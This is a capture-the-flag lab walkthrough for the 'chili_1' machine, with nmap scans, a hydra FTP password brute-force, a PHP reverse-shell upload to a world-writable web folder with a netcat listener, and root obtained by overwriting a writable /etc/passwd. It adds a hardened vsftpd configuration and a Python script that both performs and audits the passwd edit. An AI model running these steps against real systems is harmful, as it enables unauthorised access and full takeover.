chili_1 Target Machine


Information Gathering

┌──(kali㉿kali)-[~/Downloads/chili_1]
└─$ sudo nmap -sT -sV -sC -O -p21,80 192.1.1.140
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-06 07:54 EDT
Nmap scan report for 192.1.1.140
Host is up (0.00030s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Chili
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:B2:10:06 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.69 seconds

Only two ports are open. Searching for vsftpd 3.0.3 turns up nothing beyond a denial-of-service issue, so the FTP version by itself offers no way in; valid credentials are what matter here.

┌──(kali㉿kali)-[~/Downloads/chili_1]
└─$ sudo nmap --script=vuln -p21,80 192.1.1.140
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-06 07:56 EDT
Nmap scan report for 192.1.1.140
Host is up (0.00026s latency).

PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:B2:10:06 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 37.47 seconds

The vuln scripts produced nothing for either port. Note that the anonymous-login check (ftp-anon) belongs to the default category, not vuln, so the real evidence against anonymous FTP is the first scan: -sC ran ftp-anon and printed nothing, and that script only produces output when anonymous login is accepted. Anonymous FTP is therefore almost certainly disabled.

┌──(kali㉿kali)-[~/tools]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.140
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-07 09:25 EDT
Nmap scan report for 192.1.1.140
Host is up (0.00038s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:B2:10:06 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 27.90 seconds

Directory Brute-Forcing

No UDP ports are open either, so let's look at the web side and run a directory brute-force at the same time.

┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://192.1.1.140/
[sudo] password for kali:

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.1.1.140/-_23-08-06_08-03-24.txt

Error Log: /root/.dirsearch/logs/errors-23-08-06_08-03-24.log

Target: http://192.1.1.140/

[08:03:24] Starting:
[08:03:25] 403 - 276B - /.ht_wsr.txt
[08:03:25] 403 - 276B - /.htaccess.bak1
[08:03:25] 403 - 276B - /.htaccess_extra
[08:03:25] 403 - 276B - /.htaccess.sample
[08:03:25] 403 - 276B - /.htaccess_orig
[08:03:25] 403 - 276B - /.htaccess.orig
[08:03:25] 403 - 276B - /.htaccessOLD2
[08:03:25] 403 - 276B - /.htaccess.save
[08:03:25] 403 - 276B - /.htaccess_sc
[08:03:25] 403 - 276B - /.htaccessOLD
[08:03:25] 403 - 276B - /.html
[08:03:25] 403 - 276B - /.htaccessBAK
[08:03:25] 403 - 276B - /.htm
[08:03:25] 403 - 276B - /.htpasswds
[08:03:25] 403 - 276B - /.htpasswd_test
[08:03:25] 403 - 276B - /.httr-oauth
[08:03:26] 403 - 276B - /.php
[08:03:26] 200 - 736B - /.vim/
[08:03:41] 200 - 657B - /index.html
[08:03:49] 403 - 276B - /server-status
[08:03:49] 403 - 276B - /server-status/

Task Completed

Found a /.vim/ directory: it answers 200 with a directory listing, but the listing is empty. A nikto scan turned up nothing either, in particular no PUT method that would allow uploading files.

The default page on port 80 is just a single image, so let's look at the source.

There is some information in it. After reading up: the meta tags here are for crawlers. Looking through all of it, the only things of any value seem to be the words chili/chile and the file name Chile_Web.jpg.

I tried another directory brute-forcing tool as well and still got nothing particularly useful. At that point the attack path through port 80 was stuck.

Checking for Image Steganography

Next I checked Chile_Web.jpg for hidden data using exiftool, file, binwalk, strings, stegcracker, 010 Editor and stegsolve, all without result. ChatGPT was a big help in this process: it quickly explained what the various fields mean, which made it fast to rule out hidden data.

FTP Brute-Forcing

That left brute-forcing FTP. The first attempt ran for five minutes without success, so I assumed this attack path was wrong and went back to fiddling with the directory structure and the image. When I finally ran out of ideas I glanced at a walkthrough and learned that this brute-force simply takes a long time, about 15 minutes. The lesson is a change of habit: a brute-force run has to complete before the path is ruled out.

┌──(kali㉿kali)-[~/Downloads/chili_1]
└─$ hydra -l chili -P /usr/share/wordlists/rockyou.txt 192.1.1.140 ftp -t 32
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-09 17:06:58
[DATA] max 32 tasks per 1 server, overall 32 tasks, 14344399 login tries (l:1/p:14344399), ~448263 tries per task
[DATA] attacking ftp://192.1.1.140:21/
[STATUS] 576.00 tries/min, 576 tries in 00:01h, 14343823 to do in 415:03h, 32 active
[STATUS] 590.33 tries/min, 1771 tries in 00:03h, 14342628 to do in 404:56h, 32 active
[STATUS] 574.43 tries/min, 4021 tries in 00:07h, 14340378 to do in 416:05h, 32 active
[21][ftp] host: 192.1.1.140 login: chili password: a1b2c3d4
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-09 17:14:47

Raising the task count to 32 compressed the 15-minute brute-force to a little over 7 minutes. Even so the rate is only about 576 tries per minute across 32 tasks: by default vsftpd sleeps one second after every failed login (delay_failed_login=1) and drops the session after three failures (max_login_fails=3), so each task spends most of its time waiting and reconnecting. At that rate the whole rockyou list would take over 400 hours; the attack only succeeded because a1b2c3d4 sits within the first few thousand entries (hydra had made roughly 4,500 attempts when it hit).

Log in to FTP with this credential and look through the web root and the user's home directory.

┌──(kali㉿kali)-[~/Downloads/chili_1]
└─$ ftp 192.1.1.140
Connected to 192.1.1.140.
220 (vsFTPd 3.0.3)
Name (192.1.1.140:kali): chili
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||57740|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -alih
229 Entering Extended Passive Mode (|||48639|)
150 Here comes the directory listing.
drwxr-xr-x 3 1000 1000 4096 Sep 08 2020 .
drwxr-xr-x 3 0 0 4096 Sep 08 2020 ..
-rw-r--r-- 1 1000 1000 220 Sep 07 2020 .bash_logout
-rw-r--r-- 1 1000 1000 3526 Sep 07 2020 .bashrc
drwxr-xr-x 3 1000 1000 4096 Sep 08 2020 .local
-rw-r--r-- 1 1000 1000 807 Sep 07 2020 .profile
226 Directory send OK.
ftp> pwd
Remote directory: /home/chili

ftp> cd /var/www/html
250 Directory successfully changed.
ftp> ls -alih
229 Entering Extended Passive Mode (|||37526|)
150 Here comes the directory listing.
drwxr-xr-x 4 0 0 4096 Sep 08 2020 .
drwxr-xr-x 3 0 0 4096 Sep 08 2020 ..
drwxrwxrwx 2 0 0 4096 Sep 08 2020 .nano
drwxr-xr-x 2 0 0 4096 Sep 08 2020 .vim
-rw-r--r-- 1 0 0 74290 Oct 23 2018 Chile_WEB.jpg
-rw-r--r-- 1 0

Reverse Shell via the Web Root

The listing reveals a directory the brute-force did not find, .nano, and it is world-writable (drwxrwxrwx, root-owned) while the rest of the web root is root-owned and read-only. It was missed simply because .nano is not in dirsearch's wordlist (.vim is), a reminder to probe dot-directories named after common editors and tools as well. Try uploading a PHP reverse shell into it.

ftp> put php-reverse-shell.php
local: php-reverse-shell.php remote: php-reverse-shell.php
229 Entering Extended Passive Mode (|||13435|)
150 Ok to send data.
100% |***********************************************************************| 5493 45.55 MiB/s 00:00 ETA
226 Transfer complete.
5493 bytes sent in 00:00 (9.75 MiB/s)
ftp> ls -liah
229 Entering Extended Passive Mode (|||45190|)
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Aug 09 17:22 .
drwxr-xr-x 4 0 0 4096 Sep 08 2020 ..
-rw-r--r-- 1 1000 1000 0 Sep 08 2020 index.html
-rw------- 1 1000 1000 5493 Aug 09 17:22 php-reverse-shell.php
226 Directory send OK.

Requesting the uploaded file fails, and it looks like a permission problem: the upload arrived as mode 600 (rw-------) owned by chili, so the web server's www-data user cannot read it. vsftpd's default local_umask of 077 is what produces that mode. I did not think of the FTP client's chmod command at first and instead tried writing the reverse-shell code into index.html, which is empty and world-readable; but Apache serves .html files as static content rather than handing them to the PHP interpreter, so the browser simply displayed the result shown in the figure.

Typing ? in the ftp client to list its commands showed that chmod is available (the client sends SITE CHMOD, which vsftpd accepts by default), so I ran chmod 777 php.php; 644 would have been enough, since the server only needs read access.

Then, with a listener started beforehand, browsing to 192.1.1.140/.nano/php.php brings back the reverse shell.

┌──(kali㉿kali)-[~/Downloads/chili_1]
└─$ sudo nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.140] 52810
Linux chili 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
17:43:27 up 2:06, 0 users, load average: 0.05, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 1: python: not found
$ which python2
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@chili:/$
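The three things that made this foothold possible (uploads by a local user into the web root, a 600 upload mode that the client could then relax with SITE CHMOD, and no chroot keeping the FTP user out of /var/www and /etc) are all vsftpd.conf decisions. As an added illustration, not part of the original write-up and not the target's real configuration (which the page never shows), here are the settings consistent with the behaviour observed above, followed by a hardened variant. The values labelled "default" are vsftpd's documented defaults; vsftpd.conf does not allow trailing comments on a directive line, so every comment is on its own line.

```ini
# Added example; assumed configuration, not the target's actual vsftpd.conf.

# --- settings consistent with what was observed on the target ---
listen=YES
# no anonymous login, which is why only a credential brute-force worked
anonymous_enable=NO
# the local account "chili" can log in over FTP
local_enable=YES
# STOR allowed: enabled both the web-shell upload and the passwd overwrite
write_enable=YES
# default: uploads are created as mode 600, unreadable by www-data
local_umask=077
# default: SITE CHMOD is accepted, which is what the client's "chmod 777" used
chmod_enable=YES
# default: no chroot, so /var/www/html and /etc are reachable over FTP
chroot_local_user=NO
# default: one-second sleep after each failed login, what made hydra slow
delay_failed_login=1
# default: the session is dropped after three failures, so hydra reconnects
max_login_fails=3

# --- hardened variant ---
listen=YES
anonymous_enable=NO
local_enable=YES
# only accounts listed in /etc/vsftpd.user_list may log in at all
userlist_enable=YES
userlist_deny=NO
# confine each user to its home directory; /var/www and /etc are out of reach
chroot_local_user=YES
# disable uploads entirely; re-enable only for specific users who need them
write_enable=NO
# clients can no longer relax permissions on anything they upload
chmod_enable=NO
# if uploads are re-enabled, files arrive readable but not writable by others
local_umask=022
```

The config cannot fix the filesystem: /etc/passwd still has to be mode 0644 and root-owned, and nothing under /var/www/html should be world-writable, otherwise any other writable path gives the same result.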

Privilege Escalation via a Writable passwd File

Next comes privilege escalation. One thing to point out: while browsing the filesystem over FTP earlier, I had already noticed that /etc/passwd was readable and writable by other users. So I generated a password hash with openssl passwd passwd123, put it into a copy of the file, and uploaded that copy over FTP, overwriting the original. The proper order would be to check sudo -l first, confirm the foothold is the right one, and only then review permissions on sensitive files and look for SUID binaries.

www-data@chili:/$ sudo -l
bash: sudo: command not found
www-data@chili:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@chili:/$ uname -a
uname -a
Linux chili 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
www-data@chili:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:b2:10:06 brd ff:ff:ff:ff:ff:ff
inet 192.1.1.140/24 brd 192.1.1.255 scope global dynamic ens33
valid_lft 1591sec preferred_lft 1591sec
inet6 fe80::20c:29ff:feb2:1006/64 scope link
valid_lft forever preferred_lft forever

Finally, a short record of the actual operations during the attack; the reasoning was explained above.

┌──(kali㉿kali)-[~/Downloads/chili_1]
└─$ openssl passwd passwd123
$1$r5F9tOKO$3.v/LZvYOq7B990Nj1ie11

┌──(kali㉿kali)-[~/Downloads/chili_1]
└─$ vim passwd

# operations in the ftp session
ftp> get passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||61081|)
150 Opening BINARY mode data connection for passwd (1450 bytes).
100% |***********************************************************************| 1450 26.09 MiB/s 00:00 ETA
226 Transfer complete.
1450 bytes received in 00:00 (566.40 KiB/s)
ftp> put passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||60464|)
150 Ok to send data.
100% |***********************************************************************| 1483 15.89 MiB/s 00:00 ETA
226 Transfer complete.
1483 bytes sent in 00:00 (2.76 MiB/s)

The edited passwd file is 33 bytes larger than the original (1483 vs 1450), exactly the difference between root's single x and the 34-character $1$ hash that replaced it. A hash placed in field 2 of /etc/passwd is used directly; pam_unix only consults /etc/shadow when that field is x. After that, su - with passwd123 switches straight to root.

www-data@chili:/$ su -
su -
Password: passwd123

root@chili:~# cd /root
cd /root
root@chili:~# ls -liah
ls -liah
total 32K
2097153 drwx------ 3 root root 4.0K Sep 8 2020 .
2 drwxr-xr-x 18 root root 4.0K Sep 7 2020 ..
2097156 -rw------- 1 root root 126 Sep 8 2020 .bash_history
2097155 -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
2097158 drwxr-xr-x 3 root root 4.0K Sep 8 2020 .local
2097154 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
2097163 -rw-r--r-- 1 root root 47 Sep 8 2020 proof.txt
2097157 -rw-r--r-- 1 root root 176 Sep 8 2020 .wget-hsts
root@chili:~# cat proof.txt
cat proof.txt
Sun_CSR.Chili.af6d45da1f1181347b9e2139f23c6a5b
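To make the passwd trick above concrete from both sides, here is an added example (my own code, not from the original write-up): it performs the same edit on a passwd file in memory, shows the other common variant (appending a second uid 0 account), and provides the audit check a defender would run to catch either. Assumptions: PASSWD123_HASH is the string printed by `openssl passwd passwd123` on the page; SAMPLE_PASSWD is a constructed Debian-style passwd file, not the target's real one.

```python
"""Writable /etc/passwd: the edit used above, and the check that detects it.

Added example, not code from the original write-up. The hash is copied from
the page's `openssl passwd passwd123` output; the sample file is constructed.
"""
import stat

# Hash copied from the page's `openssl passwd passwd123` output (md5crypt, 34 chars).
PASSWD123_HASH = "$1$r5F9tOKO$3.v/LZvYOq7B990Nj1ie11"

# Constructed sample passwd content (not the target's real file).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "chili:x:1000:1000:chili,,,:/home/chili:/bin/bash\n"
)

# Field-2 values that mean "no usable hash here": look in /etc/shadow, or locked.
_NO_HASH = {"x", "*", "!", "!!"}


def set_passwd_hash(passwd_text: str, user: str, crypt_hash: str) -> str:
    """Return passwd_text with `user`'s second field replaced by crypt_hash.

    This is what the write-up did to root's line: pam_unix only falls back to
    /etc/shadow when the passwd field is "x", so a real hash placed here is
    authoritative and `su -` accepts the matching password.
    """
    out = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] == user:
            fields[1] = crypt_hash
        out.append(":".join(fields))
    return "\n".join(out) + "\n"


def add_uid0_user(passwd_text: str, name: str, crypt_hash: str) -> str:
    """The other common variant: append a second uid 0 account instead of
    touching root's own line. Same effect on `su`, easier to spot in an audit."""
    return passwd_text + f"{name}:{crypt_hash}:0:0::/root:/bin/bash\n"


def audit_passwd(passwd_text: str) -> list:
    """Findings a defender wants from passwd content: hashes or empty passwords
    stored in passwd instead of shadow, extra uid 0 accounts, malformed lines."""
    findings = []
    for lineno, line in enumerate(passwd_text.splitlines(), 1):
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry ({len(fields)} fields)")
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append(f"line {lineno}: {name} has an empty password")
        elif pw not in _NO_HASH:
            findings.append(f"line {lineno}: {name} has a password hash in /etc/passwd")
        if uid == "0" and name != "root":
            findings.append(f"line {lineno}: {name} is uid 0 but not root")
    return findings


def passwd_mode_is_safe(st_mode: int, st_uid: int) -> bool:
    """True for the expected state of /etc/passwd: root-owned and not writable
    by group or others (0644). On the target it was writable by others, which
    is the whole vulnerability. Pass os.stat(path).st_mode and .st_uid."""
    writable_by_non_owner = bool(st_mode & (stat.S_IWGRP | stat.S_IWOTH))
    return st_uid == 0 and not writable_by_non_owner


if __name__ == "__main__":
    # Run on a live host: check the real file's mode and content.
    import os
    st = os.stat("/etc/passwd")
    print("passwd mode safe:", passwd_mode_is_safe(st.st_mode, st.st_uid))
    with open("/etc/passwd") as fh:
        for finding in audit_passwd(fh.read()):
            print(finding)
```

Run as a script it audits the local /etc/passwd; the size delta the functions produce (34-character hash minus the single x) is the same 33 bytes visible in the FTP transfer above. The audit flags both variants because it looks at what the field contains rather than at file size or mtime, which an attacker with write access can also adjust.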

Original post: https://i3eg1nner.github.io/2023/08/47a5f7d3b51c.html
Author: I3eg1nner
Published: August 7, 2023